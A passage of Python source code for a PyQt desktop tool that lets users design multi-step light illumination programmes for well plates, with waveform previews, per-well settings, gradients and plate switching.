[0, stepLength - self.framerate]\n dp_y = [self.wvMax, self.wvMax]\n\n # Sine\n elif self.waveTypeCB.currentIndex() == 1:\n a = (self.wvMax - self.wvMin) / 2\n b = 2 * np.pi / self.wvLen\n d = a + self.wvMin\n if self.wvStart == 'Low':\n c = - (self.wvLen/4)\n elif self.wvStart == 'High':\n c = (self.wvLen/4)\n\n time = np.arange(0, stepLength, self.framerate) \n wave = a * np.sin(b * (time + c)) + d\n\n for i in range(len(time)):\n if i == 0:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n elif i+1 == len(time):\n if wave[i] == wave[i-1]:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n else:\n dp_x.append(time[i])\n dp_y.append(wave[i-1])\n else:\n if wave[i] == wave[i-1]:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n else:\n dp_x.append(time[i])\n dp_y.append(wave[i-1])\n\n dp_x.append(time[i])\n dp_y.append(wave[i])\n\n # Tri\n elif self.waveTypeCB.currentIndex() == 2:\n a = (self.wvMax - self.wvMin) / 2\n d = a + self.wvMin\n if self.wvStart == 'Low':\n c = - (self.wvLen/4)\n elif self.wvStart == 'High':\n c = (self.wvLen/4)\n\n time = np.arange(0, stepLength, self.framerate) \n wave = (4 * a/self.wvLen * abs(((time + c - self.wvLen/4) % self.wvLen) - self.wvLen/2) - a) + d\n\n for i in range(len(time)):\n if i == 0:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n elif i+1 == len(time):\n if wave[i] == wave[i-1]:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n else:\n dp_x.append(time[i])\n dp_y.append(wave[i-1])\n else:\n if wave[i] == wave[i-1]:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n else:\n dp_x.append(time[i])\n dp_y.append(wave[i-1])\n\n dp_x.append(time[i])\n dp_y.append(wave[i])\n\n # Square / PWM\n elif self.waveTypeCB.currentIndex() in {3, 4}:\n\n TimePeriod = 
self.periodPWM\n percent = self.dutyCyclePWM\n if self.waveTypeCB.currentIndex() == 3:\n TimePeriod = self.wvLen\n percent = 0.5\n\n time = np.arange(0, stepLength, self.framerate)\n wave = []\n\n if self.wvStart == 'Low':\n pwm = time % TimePeriod < TimePeriod * percent\n for dp in pwm:\n if dp:\n wave.append(0)\n else:\n wave.append(self.wvMax)\n elif self.wvStart == 'High':\n pwm = time % TimePeriod < TimePeriod * percent\n for dp in pwm:\n if dp:\n wave.append(self.wvMax)\n else:\n wave.append(0)\n\n for i in range(len(time)):\n if i == 0:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n elif i+1 == len(time):\n if wave[i] == wave[i-1]:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n else:\n dp_x.append(time[i])\n dp_y.append(wave[i-1])\n else:\n if wave[i] == wave[i-1]:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n else:\n dp_x.append(time[i])\n dp_y.append(wave[i-1])\n\n dp_x.append(time[i])\n dp_y.append(wave[i])\n \n # Rise\n elif self.waveTypeCB.currentIndex() == 5:\n time = np.arange(0, stepLength, self.framerate)\n wave = []\n\n diff = self.wvMax - self.wvMin\n dp = self.wvMin\n\n for i in range(len(time)):\n wave.append(dp)\n dp += diff/(len(time)-2)\n\n for i in range(len(time)):\n if i == 0:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n elif i+1 == len(time):\n if wave[i] == wave[i-1]:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n else:\n dp_x.append(time[i])\n dp_y.append(wave[i-1])\n else:\n if wave[i] == wave[i-1]:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n else:\n dp_x.append(time[i])\n dp_y.append(wave[i-1])\n\n dp_x.append(time[i])\n dp_y.append(wave[i])\n \n # Fall\n elif self.waveTypeCB.currentIndex() == 6:\n time = np.arange(0, stepLength, self.framerate)\n wave = []\n\n diff = self.wvMax - self.wvMin\n dp = self.wvMax\n\n for i in range(len(time)):\n wave.append(dp)\n dp -= diff/(len(time)-2)\n\n for i in range(len(time)):\n if i == 0:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n elif i+1 == len(time):\n if wave[i] == wave[i-1]:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n else:\n dp_x.append(time[i])\n dp_y.append(wave[i-1])\n else:\n if wave[i] == wave[i-1]:\n dp_x.append(time[i])\n dp_y.append(wave[i])\n else:\n dp_x.append(time[i])\n dp_y.append(wave[i-1])\n\n dp_x.append(time[i])\n dp_y.append(wave[i])\n \n self.graphWidget.setLimits(xMin = 0, xMax = stepLength - self.framerate + (stepLength - self.framerate) * 0.05, yMin = -1, yMax = 256, minXRange = 5, minYRange = 25)\n self.graphWidget.setXRange(0, stepLength - self.framerate + (stepLength - self.framerate) * 0.05)\n self.graphWidget.removeItem(self.data_line)\n self.data_line = self.graphWidget.plot(dp_x, dp_y, pen=self.pen)\n\n def showPlot(self, state):\n if (Qt.Checked == state):\n self.graphProgrammStack.setCurrentIndex(1)\n self.plotPreviewDisplayed = True\n self.updatePlot()\n else:\n self.graphProgrammStack.setCurrentIndex(0)\n self.plotPreviewDisplayed = False\n\n def changeSelectionType(self, seltyp):\n if seltyp == 0:\n self.ParameterBox.setDisabled(False)\n self.GradientBox.setDisabled(True)\n self.applyChangesButton.setDisabled(False)\n self.selected_wells = set()\n self.applyParameterChanges()\n\n elif seltyp == 2:\n self.ParameterBox.setDisabled(False)\n self.GradientBox.setDisabled(True)\n self.applyChangesButton.setDisabled(True)\n self.selected_wells = set()\n self.applyParameterChanges()\n\n elif seltyp == 1:\n self.ParameterBox.setDisabled(True)\n self.GradientBox.setDisabled(False)\n self.selected_wells = set()\n self.graphProgrammStack.setCurrentIndex(0)\n 
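# index 0 of the stack shows the programme box; the gradient designer has no live plot preview\n            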
self.plotPreviewDisplayed = False\n self.showPlotCB.setChecked(False)\n\n self.applyParameterChanges()\n self.select_wells(1)\n\n def updateDuration_info(self, step_nr):\n self.StepInformations[step_nr][0][0] = self.StepGBoxes[step_nr][4].value()\n self.StepInformations[step_nr][0][1] = self.StepGBoxes[step_nr][5].value()\n self.StepInformations[step_nr][0][2] = self.StepGBoxes[step_nr][6].value()\n\n def updateDuration_SB(self, step_nr):\n self.StepGBoxes[step_nr][4].valueChanged.disconnect()\n self.StepGBoxes[step_nr][5].valueChanged.disconnect()\n self.StepGBoxes[step_nr][6].valueChanged.disconnect()\n self.StepGBoxes[step_nr][4].setValue(self.StepInformations[step_nr][0][0])\n self.StepGBoxes[step_nr][5].setValue(self.StepInformations[step_nr][0][1])\n self.StepGBoxes[step_nr][6].setValue(self.StepInformations[step_nr][0][2])\n self.StepGBoxes[step_nr][4].valueChanged.connect(lambda ignore: self.updateDuration_info(self.StepGBoxes[step_nr][0]))\n self.StepGBoxes[step_nr][5].valueChanged.connect(lambda ignore: self.updateDuration_info(self.StepGBoxes[step_nr][0]))\n self.StepGBoxes[step_nr][6].valueChanged.connect(lambda ignore: self.updateDuration_info(self.StepGBoxes[step_nr][0]))\n\n def addStep(self):\n self.amount_of_steps += 1\n self.addStepBox()\n\n def changeStep(self, step_nr, modify_Step = False):\n # Update Step Information\n selctedPlate = self.plate_nr\n\n if not modify_Step:\n self.StepInformations[self.selceted_step][1] = self.getStepInfo()\n\n # Change Step\n self.selceted_step = step_nr\n\n # Change Style\n for step in self.StepGBoxes:\n self.StepGBoxes[step][1].setStyleSheet(\"\") \n self.StepGBoxes[step_nr][1].setStyleSheet(\n \"QGroupBox{background-color: transparent;\"\n \"border: 1px solid blue;\"\n \"border-radius: 5px;\"\n \"margin-top: 1ex;}\"\n \"QGroupBox:title {subcontrol-position: top left;\"\n \"padding: -14px 0px 0px 3px; color:blue;}\")\n self.CurrentStepGBox.setTitle('Step ' + str(step_nr))\n\n # Load Info\n self.loadStepInfo(self.StepInformations[self.selceted_step][1])\n\n if selctedPlate == 0:\n self.plate_chooser_CB.setCurrentIndex(0)\n elif selctedPlate == 1:\n self.plate_chooser_CB.setCurrentIndex(1)\n\n def deleteStep(self, step_nr):\n\n if self.amount_of_steps > 1:\n stillcontinue = True\n # Are you sure Message Box\n if self.StepInformations[step_nr][1] != {'Plate 1 Wells': {}, 'Plate 1 Type': 96, 'Plate 2 Wells': {}, 'Plate 2 Type': 96}:\n stillcontinue = False\n\n if stillcontinue == False:\n clear_plate_MessageBox = QMessageBox()\n clear_plate = clear_plate_MessageBox.question(self,'', \"You already modified Step {}. 
Do you still want to continue?\".format(step_nr), clear_plate_MessageBox.Yes | clear_plate_MessageBox.No)\n                if clear_plate == clear_plate_MessageBox.Yes:\n                    stillcontinue = True\n                else:\n                    stillcontinue = False\n\n            if stillcontinue:\n                # Update Changes\n                self.StepInformations[self.selceted_step][1] = self.getStepInfo()\n\n                # Remove Widget\n                for step in range(self.amount_of_steps):\n                    self.StepGBoxes[step+1][1].deleteLater()\n                    del self.StepGBoxes[step+1]\n\n                new_amount_of_steps = self.amount_of_steps - 1\n                self.amount_of_steps = 0\n\n                for step in range(new_amount_of_steps):\n                    self.amount_of_steps += 1\n                    self.addStepBox(newStep = False)\n\n                # Remove Information\n                del self.StepInformations[step_nr]\n\n                higher_steps = []\n                for step in self.StepInformations:\n                    if step_nr < step:\n                        higher_steps.append(step)\n\n                for step in higher_steps:\n                    self.StepInformations[step-1] = self.StepInformations.pop(step)\n\n                # Update Information\n                for step in self.StepInformations:\n                    self.updateDuration_SB(step)\n\n                # Change Step if selected Step deleted\n                if step_nr == self.selceted_step:\n                    if step_nr == self.amount_of_steps + 1:\n                        self.changeStep(self.selceted_step - 1, modify_Step = True)\n                    else:\n                        self.changeStep(self.selceted_step, modify_Step = True)\n                elif step_nr < self.selceted_step:\n                    self.changeStep(self.selceted_step-1, modify_Step = True)\n                else:\n                    self.changeStep(self.selceted_step, modify_Step = True)\n\n    def applyParameterChanges(self):\n        if self.color_chooser.currentIndex() == 0:\n            for selected_well in self.selected_wells:\n                if self.plate_nr == 0:\n                    try:\n                        del self.used_wells_plate_1[selected_well]\n                    except KeyError:\n                        pass\n                elif self.plate_nr == 1:\n                    try:\n                        del self.used_wells_plate_2[selected_well]\n                    except KeyError:\n                        pass\n        else:\n            if self.color_chooser.currentIndex() == 1:\n                button_color = (int(sqrt(self.maxIntensitySB.value()) * 15.99), 0, 0)\n                light_button_color = (255, 102, 102)\n            elif self.color_chooser.currentIndex() == 2:\n                button_color = (0, int(sqrt(self.maxIntensitySB.value()) * 15.99), 0)\n                light_button_color = (102, 255, 102)\n            elif self.color_chooser.currentIndex() == 3:\n                button_color = (0, 0, int(sqrt(self.maxIntensitySB.value()) * 15.99))\n                light_button_color = (153, 204, 255)\n\n            for selected_well in self.selected_wells:\n                if self.waveTypeCB.currentIndex() == 0:\n                    wellInformation= {\n                        'waveType': 'const',\n                        'color': self.color_chooser.currentText(),\n                        'maxVal': self.maxIntensitySB.value(),\n                        'position': None,\n                        'button_color': button_color,\n                        'Icon': None}\n                elif self.waveTypeCB.currentIndex() == 1:\n                    wellInformation= {\n                        'waveType': 'sin',\n                        'color': self.color_chooser.currentText(),\n                        'maxVal': self.maxIntensitySB.value(),\n                        'minVal': self.minIntensitySB.value(),\n                        'wvLen': self.wavelengthSB.value(),\n                        'start': self.startAnimationCB.currentText(),\n                        'position': None,\n                        'button_color': light_button_color,\n                        'Icon': os.path.join(basedir, 'resources', 'animation-sin.svg')}\n                elif self.waveTypeCB.currentIndex() == 2:\n                    wellInformation= {\n                        'waveType': 'tri',\n                        'color': self.color_chooser.currentText(),\n                        'maxVal': self.maxIntensitySB.value(),\n                        'minVal': self.minIntensitySB.value(),\n                        'wvLen': self.wavelengthSB.value(),\n                        'start': self.startAnimationCB.currentText(),\n                        'position': None,\n                        'button_color': light_button_color,\n                        'Icon': os.path.join(basedir, 'resources', 'animation-tri.svg')}\n                elif self.waveTypeCB.currentIndex() == 3:\n                    wellInformation= {\n                        'waveType': 'sq',\n                        'color': self.color_chooser.currentText(),\n                        'maxVal': self.maxIntensitySB.value(),\n                        'minVal': 
self.minIntensitySB.value(),\n 'wvLen': self.wavelengthSB.value(),\n 'start': self.startAnimationCB.currentText(),\n 'position': None,\n 'button_color': light_button_color,\n 'Icon': os.path.join(basedir, 'resources', 'animation-sq.svg')}\n elif self.waveTypeCB.currentIndex() == 4:\n wellInformation= {\n 'waveType': 'pwm',\n 'color': self.color_chooser.currentText(),\n 'maxVal': self.maxIntensitySB.value(),\n 'dutyCyclePWM': self.dutyCycleSB.value() / 100,\n 'periodPWM': self.periodPWMSB.value(),\n 'start': self.startAnimationCB.currentText(),\n 'position': None,\n 'button_color': light_button_color,\n 'Icon': os.path.join(basedir, 'resources', 'animation-blink.svg')}\n elif self.waveTypeCB.currentIndex() == 5:\n wellInformation= {\n 'waveType': 'rise',\n 'color': self.color_chooser.currentText(),\n 'maxVal': self.maxIntensitySB.value(),\n 'minVal': self.minIntensitySB.value(),\n 'position': None,\n 'button_color': light_button_color,\n 'Icon': os.path.join(basedir, 'resources', 'animation-rise.svg')}\n elif self.waveTypeCB.currentIndex() == 6:\n wellInformation= {\n 'waveType': 'fall',\n 'color': self.color_chooser.currentText(),\n 'maxVal': self.maxIntensitySB.value(),\n 'minVal': self.minIntensitySB.value(),\n 'position': None,\n 'button_color': light_button_color,\n 'Icon': os.path.join(basedir, 'resources', 'animation-fall.svg')}\n\n\n if self.plate_nr == 0: \n wellInformation['position'] = (0,) + self.Button_to_pos[selected_well]\n self.used_wells_plate_1[selected_well] = wellInformation\n elif self.plate_nr == 1: \n wellInformation['position'] = (1,) + self.Button_to_pos[selected_well]\n self.used_wells_plate_2[selected_well] = wellInformation\n\n self.selected_wells = set()\n self.StepInformations[self.selceted_step][1] = self.getStepInfo()\n self.changeButtonColor()\n\n def createGradient(self):\n\n '''Creating list of RGB values for Gradient'''\n\n gradient_values = []\n gradient_color_values = []\n upper_level, lower_level = round(self.max_gradient.value()), round(self.min_gradient.value())\n\n if self.direction_chooser_gradient.currentIndex() in {0, 1}:\n gradient_step = (upper_level - lower_level) / (self.height_gradient.value() - 1)\n gradient_values = [round(lower_level + (gradient_step * x)) for x in range(self.height_gradient.value())]\n else:\n gradient_step = (upper_level - lower_level) / (self.width_gradient.value() - 1)\n gradient_values = [round(lower_level + (gradient_step * x)) for x in range(self.width_gradient.value())] \n\n if self.color_chooser_gradient.currentIndex() == 0:\n for i in range(len(gradient_values)):\n gradient_color_values.append((gradient_values[i],0, 0))\n elif self.color_chooser_gradient.currentIndex() == 1:\n for i in range(len(gradient_values)):\n gradient_color_values.append((0, gradient_values[i], 0))\n elif self.color_chooser_gradient.currentIndex() == 2:\n for i in range(len(gradient_values)):\n gradient_color_values.append((0 ,0, gradient_values[i]))\n\n '''Creating grandient with positions'''\n\n self.gradientMatrix = []\n\n if self.direction_chooser_gradient.currentIndex() in {0, 1}:\n for y in range(self.height_gradient.value()):\n y_pos = y + self.PosTL[0]\n for x in range(self.width_gradient.value()):\n x_pos = x + self.PosTL[1]\n if self.direction_chooser_gradient.currentIndex() == 0:\n self.gradientMatrix.append(((y_pos, x_pos) , (gradient_color_values[-(y+1)])))\n elif self.direction_chooser_gradient.currentIndex() == 1:\n self.gradientMatrix.append(((y_pos, x_pos) , (gradient_color_values[y])))\n else:\n for y in 
range(self.height_gradient.value()):\n y_pos = y + self.PosTL[0]\n for x in range(self.width_gradient.value()):\n x_pos = x + self.PosTL[1]\n if self.direction_chooser_gradient.currentIndex() == 2:\n self.gradientMatrix.append(((y_pos, x_pos) , (gradient_color_values[-(x+1)])))\n elif self.direction_chooser_gradient.currentIndex() == 3:\n self.gradientMatrix.append(((y_pos, x_pos) , (gradient_color_values[x])))\n\n ''' Gradient to enlighted wells'''\n\n if self.plate_nr == 0:\n gradient_wells_plate_1 = {}\n for well in self.gradientMatrix:\n if well[1][0] != 0:\n button_color = (int(sqrt(well[1][0]) * 15.99), 0, 0)\n elif well[1][1] != 0:\n button_color = (0, int(sqrt(well[1][1]) * 15.99), 0)\n elif well[1][2] != 0:\n button_color = (0, 0, int(sqrt(well[1][2]) * 15.99))\n else:\n button_color = (0, 0, 0)\n gradient_wells_plate_1[self.Pos_to_Button[well[0]]] = {\\\n 'waveType': 'const',\\\n 'color': self.color_chooser_gradient.currentText(),\\\n 'maxVal': max(well[1]),\\\n 'position': (0, well[0][0], well[0][1]),\n 'button_color': button_color,\n 'Icon': None}\n elif self.plate_nr == 1:\n gradient_wells_plate_2 = {}\n for well in self.gradientMatrix:\n if well[1][0] != 0:\n button_color = (int(sqrt(well[1][0]) * 15.99), 0, 0)\n elif well[1][1] != 0:\n button_color = (0, int(sqrt(well[1][1]) * 15.99), 0)\n elif well[1][2] != 0:\n button_color = (0, 0, int(sqrt(well[1][2]) * 15.99))\n gradient_wells_plate_2[self.Pos_to_Button[well[0]]] = {\\\n 'waveType': 'const',\\\n 'color': self.color_chooser_gradient.currentText(),\\\n 'maxVal': max(well[1]),\\\n 'position': (1, well[0][0], well[0][1]),\n 'button_color': button_color,\n 'Icon': None}\n\n if (self.plate_nr == 0 and bool(gradient_wells_plate_1.keys() & self.used_wells_plate_1.keys()))\\\n or (self.plate_nr == 1 and bool(gradient_wells_plate_2.keys() & self.used_wells_plate_2.keys())):\n clear_plate_MessageBox = QMessageBox()\n clear_plate = clear_plate_MessageBox.question(self,'', \"Some wells in the gradient area are already illuminated. 
Do you still want to continue?\", clear_plate_MessageBox.Yes | clear_plate_MessageBox.No)\n if clear_plate == clear_plate_MessageBox.Yes:\n if self.plate_nr == 0:\n self.used_wells_plate_1.update(gradient_wells_plate_1)\n elif self.plate_nr == 1:\n self.used_wells_plate_2.update(gradient_wells_plate_2)\n else:\n if self.plate_nr == 0:\n self.used_wells_plate_1.update(gradient_wells_plate_1)\n elif self.plate_nr == 1:\n self.used_wells_plate_2.update(gradient_wells_plate_2)\n\n self.selected_wells = set() \n self.changeButtonColor()\n\n def select_row(self, row_nr):\n if self.selectWellsRB.isChecked():\n buttons_that_row = set()\n for pos, well in self.Pos_to_Button.items():\n if pos[0] == row_nr - 1:\n buttons_that_row.add(well)\n if buttons_that_row.issubset(self.selected_wells) or not bool(buttons_that_row & self.selected_wells):\n for well in buttons_that_row:\n self.select_well(well)\n else:\n for well in buttons_that_row:\n if well in self.selected_wells:\n self.selected_wells.remove(well)\n self.select_well(well)\n else: \n pass\n\n def select_col(self, col_nr):\n if self.selectWellsRB.isChecked():\n buttons_that_col = set()\n for pos, well in self.Pos_to_Button.items():\n if pos[1] == col_nr - 1:\n buttons_that_col.add(well)\n if buttons_that_col.issubset(self.selected_wells) or not bool(buttons_that_col & self.selected_wells):\n for well in buttons_that_col:\n self.select_well(well)\n else:\n for well in buttons_that_col:\n if well in self.selected_wells:\n self.selected_wells.remove(well)\n self.select_well(well)\n else:\n pass\n\n def select_all(self):\n if self.selectWellsRB.isChecked():\n if len(self.selected_wells) != self.plate_type and len(self.selected_wells) != 0:\n self.selected_wells = set()\n for i in range(len(self.Button_to_pos)):\n self.select_well(i+1)\n else:\n pass\n\n def select_wells(self, button_nr):\n if self.selectWellsRB.isChecked():\n self.select_well(button_nr)\n elif self.getSettingsRB.isChecked():\n self.getWellSettings(button_nr = button_nr)\n elif self.createGradientRB.isChecked():\n self.ButtonNrTL = button_nr\n self.PosTL = self.Button_to_pos['Button_{}'.format(button_nr)]\n self.width_gradient.setMaximum(self.plate_width - self.PosTL[1])\n self.height_gradient.setMaximum(self.plate_height - self.PosTL[0])\n if self.PosTL[0] + self.height_gradient.value() <= self.plate_height and\\\n self.PosTL[1] + self.width_gradient.value() <= self.plate_width:\n self.selected_wells = set()\n self.applyParameterChanges()\n for y in range(self.height_gradient.value()):\n for x in range(self.width_gradient.value()):\n button_to_select = self.Pos_to_Button[(self.PosTL[0]+y, self.PosTL[1]+x)]\n self.select_well(int(button_to_select.strip('Button_')))\n\n def select_well(self, button_nr):\n if isinstance(button_nr, str):\n button_to_select = button_nr\n else:\n button_to_select = 'Button_{}'.format(button_nr)\n\n if button_to_select in self.selected_wells:\n self.selected_wells.remove(button_to_select)\n if self.plate_nr == 0 and button_to_select in self.used_wells_plate_1:\n button_color = self.used_wells_plate_1[button_to_select]['button_color']\n self.well_buttons[button_to_select].\\\n setStyleSheet(\"border-radius : {radius}; border: 1px solid black;\\\n background-color: rgb({red}, {green}, {blue})\".\\\n format(radius = self.well_button_radius, red = button_color[0],\\\n green = button_color[1], blue = button_color[2]))\n self.well_buttons[button_to_select].setIcon(QIcon(self.used_wells_plate_1[button_to_select]['Icon']))\n\n elif self.plate_nr == 1 and 
button_to_select in self.used_wells_plate_2:\n button_color = self.used_wells_plate_2[button_to_select]['button_color']\n self.well_buttons[button_to_select].\\\n setStyleSheet(\"border-radius : {radius}; border: 1px solid black;\\\n background-color: rgb({red}, {green}, {blue})\".\\\n format(radius = self.well_button_radius, red = button_color[0],\\\n green = button_color[1], blue = button_color[2]))\n self.well_buttons[button_to_select].setIcon(QIcon(self.used_wells_plate_2[button_to_select]['Icon']))\n else:\n self.well_buttons[button_to_select].setStyleSheet(\"border-radius : {radius}; border: 1px solid black\".\\\n format(radius = self.well_button_radius))\n self.well_buttons[button_to_select].setIcon(QIcon())\n\n else:\n self.selected_wells.add(button_to_select)\n self.well_buttons[button_to_select].setStyleSheet(\"border-radius : {radius}; border: 1px solid black; background-color: #f696ff\".\\\n format(radius = self.well_button_radius))\n self.well_buttons[button_to_select].setIcon(QIcon())\n\n def changePlate(self):\n if self.plate_chooser_CB.currentIndex() != 2:\n self.plate_nr = self.plate_chooser_CB.currentIndex()\n else:\n self.plate_nr = 0\n self.selected_wells = set()\n self.graphProgrammStack.setCurrentIndex(0)\n self.plotPreviewDisplayed = False\n self.showPlotCB.setChecked(False)\n\n if self.plate_nr_type[0] != self.plate_nr_type[1]:\n self.plate_type = self.plate_nr_type[self.plate_nr]\n\n self.reset(self.plate_type, full_step_reset = False)\n self.wellButtonBox.deleteLater()\n self.createwellButtonBox()\n\n Preview_select_Layout = QVBoxLayout()\n Preview_select_Layout.addStretch()\n Preview_select_Layout.addWidget(self.wellButtonBox)\n Preview_select_Layout.addStretch()\n\n self.CurrentStepGBox_Layout.addLayout(Preview_select_Layout)\n\n self.plate_type_CB.blockSignals(True)\n if self.plate_type == 96:\n self.plate_type_CB.setCurrentIndex(0)\n elif self.plate_type == 24:\n self.plate_type_CB.setCurrentIndex(1)\n elif self.plate_type == 6:\n self.plate_type_CB.setCurrentIndex(2)\n self.plate_type_CB.blockSignals(False)\n else:\n self.reset(self.plate_type, full_step_reset = False)\n\n self.changeButtonColor()\n\n def changePlateType(self):\n changePlate = None\n plateEmtpy = False\n oldPlateType = self.plate_type\n newPlateType = None\n\n if self.plate_type_CB.currentIndex() == 0:\n newPlateType = 96\n elif self.plate_type_CB.currentIndex() == 1:\n newPlateType = 24\n elif self.plate_type_CB.currentIndex() == 2:\n newPlateType = 6\n elif self.plate_type_CB.currentIndex() == 3:\n newPlateType = 0\n\n if oldPlateType == newPlateType:\n return\n\n self.graphProgrammStack.setCurrentIndex(0)\n self.plotPreviewDisplayed = False\n self.showPlotCB.setChecked(False)\n\n for step in self.StepInformations:\n if self.plate_nr == 0:\n if self.StepInformations[step][1]['Plate 1 Wells'] == {}:\n plateEmtpy = True\n elif self.plate_nr == 1:\n if self.StepInformations[step][1]['Plate 2 Wells'] == {}:\n plateEmtpy = True\n\n if not plateEmtpy:\n clear_plate_MessageBox = QMessageBox()\n clear_plate = clear_plate_MessageBox.question(self,'', \"When you change the plate type, all wells already created on this Plate are reset. 
Do you still want to continue?\", clear_plate_MessageBox.Yes | clear_plate_MessageBox.No)\n if clear_plate == clear_plate_MessageBox.Yes:\n changePlate = True\n else: \n changePlate = False\n else:\n changePlate = True\n\n if changePlate:\n self.plate_type = newPlateType\n \n for step in self.StepInformations:\n if self.plate_nr == 0:\n self.StepInformations[step][1]['Plate 1 Wells'] = {}\n self.StepInformations[step][1]['Plate 1 Type'] = self.plate_type\n if self.plate_nr == 1:\n self.StepInformations[step][1]['Plate 2 Wells'] = {}\n self.StepInformations[step][1]['Plate 2 Type'] = self.plate_type\n\n self.reset(plate_type = self.plate_type, plate_nr = self.plate_nr)\n self.wellButtonBox.deleteLater()\n self.createwellButtonBox()\n Preview_select_Layout = QVBoxLayout()\n Preview_select_Layout.addStretch()\n Preview_select_Layout.addWidget(self.wellButtonBox)\n Preview_select_Layout.addStretch()\n\n self.CurrentStepGBox_Layout.addLayout(Preview_select_Layout)\n\n self.plate_nr_type[self.plate_nr] = self.plate_type\n\n else:\n self.plate_type_CB.blockSignals(True)\n if self.plate_type == 96:\n self.plate_type_CB.setCurrentIndex(0)\n elif self.plate_type == 24:\n self.plate_type_CB.setCurrentIndex(1)\n elif self.plate_type == 6:\n self.plate_type_CB.setCurrentIndex(2)\n self.plate_type_CB.blockSignals(False)\n\n def duplicate_plate(self):\n clearPlate = False\n if (self.plate_nr == 0 and self.used_wells_plate_2 != {})\\\n or (self.plate_nr == 1 and self.used_wells_plate_1 != {}):\n clear_plate_MessageBox = QMessageBox()\n clear_plate = clear_plate_MessageBox.question(self,'', \"Colored wells have already been created for plate {}. Do you still want to continue?\".format(2 if self.plate_nr == 0 else 1), clear_plate_MessageBox.Yes | clear_plate_MessageBox.No)\n if clear_plate == clear_plate_MessageBox.Yes:\n clearPlate = True\n else:\n clearPlate = True\n\n if clearPlate:\n if self.plate_nr == 0:\n if self.plate_nr_type[1] != self.plate_nr_type[0]:\n for step in self.StepInformations:\n self.StepInformations[step][1]['Plate 2 Wells'] = {}\n self.StepInformations[step][1]['Plate 2 Type'] = self.plate_nr_type[0]\n tempWellplate = {}\n for well, settings in self.StepInformations[self.selceted_step][1]['Plate 1 Wells'].items():\n tempSettings = settings.copy()\n tempSettings['position'] = (1, settings['position'][1], settings['position'][2])\n tempWellplate[well] = tempSettings\n self.StepInformations[self.selceted_step][1]['Plate 2 Wells'] = tempWellplate.copy()\n self.used_wells_plate_2 = tempWellplate.copy()\n self.plate_nr_type[1] = self.plate_nr_type[0]\n elif self.plate_nr == 1:\n if self.plate_nr_type[1] != self.plate_nr_type[0]:\n for step in self.StepInformations:\n self.StepInformations[step][1]['Plate 1 Wells'] = {}\n self.StepInformations[step][1]['Plate 1 Type'] = self.plate_nr_type[1]\n tempWellplate = {}\n for well, settings in self.StepInformations[self.selceted_step][1]['Plate 2 Wells'].items():\n tempSettings = settings.copy()\n tempSettings['position'] = (0, settings['position'][1], settings['position'][2])\n tempWellplate[well] = tempSettings\n self.StepInformations[self.selceted_step][1]['Plate 1 Wells'] = tempWellplate.copy()\n self.used_wells_plate_1 = tempWellplate.copy()\n self.plate_nr_type[0] = self.plate_nr_type[1]\n else:\n return\n\n\n def changeButtonColor(self):\n self.selected_wells = set()\n for button in self.well_buttons:\n self.well_buttons[button].setStyleSheet(\"border-radius : {radius}; border: 1px solid black;\".format(radius = self.well_button_radius))\n 
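# Also drop any waveform icon left from a previous configuration of this well.\n            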
self.well_buttons[button].setIcon(QIcon())\n if self.plate_nr == 0:\n for used_well in self.used_wells_plate_1:\n button_color = self.used_wells_plate_1[used_well]['button_color']\n self.well_buttons[used_well].setStyleSheet(\"border-radius : {radius}; border: 1px solid black; background-color: rgb({red},{green},{blue})\".\\\n format(radius = self.well_button_radius, red = button_color[0], green = button_color[1], blue = button_color[2]))\n self.well_buttons[used_well].setIcon(QIcon(self.used_wells_plate_1[used_well]['Icon']))\n elif self.plate_nr == 1:\n for used_well in self.used_wells_plate_2:\n button_color = self.used_wells_plate_2[used_well]['button_color']\n self.well_buttons[used_well].setStyleSheet(\"border-radius : {radius}; border: 1px solid black; background-color: rgb({red},{green},{blue})\".\\\n format(radius = self.well_button_radius, red = button_color[0], green = button_color[1], blue = button_color[2]))\n self.well_buttons[used_well].setIcon(QIcon(self.used_wells_plate_2[used_well]['Icon']))\n\n #Settings\n def changeShape(self, imageType):\n self.selectWellsRB.setChecked(True)\n self.createGradientRB.setChecked(False)\n self.changeSelectionType(0)\n if imageType == 'wellplate':\n self.plate_chooser_CBView.setRowHidden(2, True)\n self.plate_type_CBView.setRowHidden(3, True)\n\n self.plate_type_CB.setCurrentIndex(0)\n self.plate_chooser_CB.setCurrentIndex(0)\n\n self.PlateChooserBox.setDisabled(False)\n self.createGradientRB.setDisabled(False)\n\n self.reset()\n\n for step in self.StepInformations:\n self.StepInformations[step][1]['Plate 1 Wells'] = {}\n self.StepInformations[step][1]['Plate 2 Wells'] = {}\n self.StepInformations[step][1]['Plate 1 Type'] = 96\n self.StepInformations[step][1]['Plate 2 Type'] = 96\n\n if imageType == 'custompattern':\n\n self.reset()\n\n for step in self.StepInformations:\n self.StepInformations[step][1]['Plate 1 Wells'] = {}\n self.StepInformations[step][1]['Plate 2 Wells'] = {}\n self.StepInformations[step][1]['Plate 1 Type'] = 96\n self.StepInformations[step][1]['Plate 2 Type'] = 96\n\n self.plate_chooser_CBView.setRowHidden(2, False)\n self.plate_type_CBView.setRowHidden(3, False)\n\n self.plate_type_CB.setCurrentIndex(3)\n self.plate_chooser_CB.setCurrentIndex(2)\n\n self.PlateChooserBox.setDisabled(True)\n self.createGradientRB.setDisabled(True)\n\n \n '''\n def framerateChanged(self, framerate = None):\n if framerate is not None:\n self.framerate = framerate\n '''\n\n #Exporting/Reseting\n def reset(self, plate_type = 96, full_step_reset = True, full_reset = False, plate_nr = None):\n self.plate_type = plate_type\n\n if self.plate_type == 96:\n self.plate_width = 8\n self.plate_height = 12\n self.well_button_size = 30\n self.well_button_radius = 15\n elif self.plate_type == 24:\n self.plate_width = 4\n self.plate_height = 6\n self.well_button_size = 60\n self.well_button_radius = 30\n elif self.plate_type == 6:\n self.plate_width = 2\n self.plate_height = 3\n self.well_button_size = 120\n 